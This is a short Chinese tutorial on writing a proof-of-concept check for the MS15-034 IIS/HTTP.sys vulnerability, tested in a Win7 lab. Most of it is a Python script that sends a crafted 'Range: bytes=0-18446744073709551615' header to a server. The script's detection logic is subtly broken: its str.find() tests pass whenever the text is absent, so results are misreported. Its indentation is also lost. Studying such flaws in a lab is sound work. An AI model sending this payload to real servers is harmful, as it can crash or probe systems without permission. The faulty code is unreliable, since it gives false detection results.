漏洞原理
1. 一些问题
问:
为什么有成熟的工具了,我们还需要自己编写?
答:
一些漏洞刚刚被披露出来的时候,网上是没有对应的工具的。
这个时候就要求我们根据漏洞原理写出对应的POC代码,用来验证漏洞是否存在。
2. 本文以ms15-034为例子。
原理的话,本文就不占用篇幅取介绍了,可以自行百度。
复现的话,本机装一个win7 sp1,开启iis服务即可。
Win 7安装iis 7组件:https://jingyan.baidu.com/article/2fb0ba40916a1c00f2ec5ff7.html
代码编写
,
import requests
url = "http://192.168.26.133"
r = requests.get(url)
server = r.headers["Server"]
if server.find("IIS/7.5") or server.find("IIS/8.0"):
payloay = {
"Host":"irrelevant","Range": "bytes=0-18446744073709551615"} #注意字典内容格式
r1 = requests.get(url,headers=payloay)
if r1.text.find("Requested Range Not Satisfiable"):
print("检测存在ms15-034")
else:
print("未检测到ms15-034")
else:
print("服务器组件不是IIS 7.5或者IIS 8.0")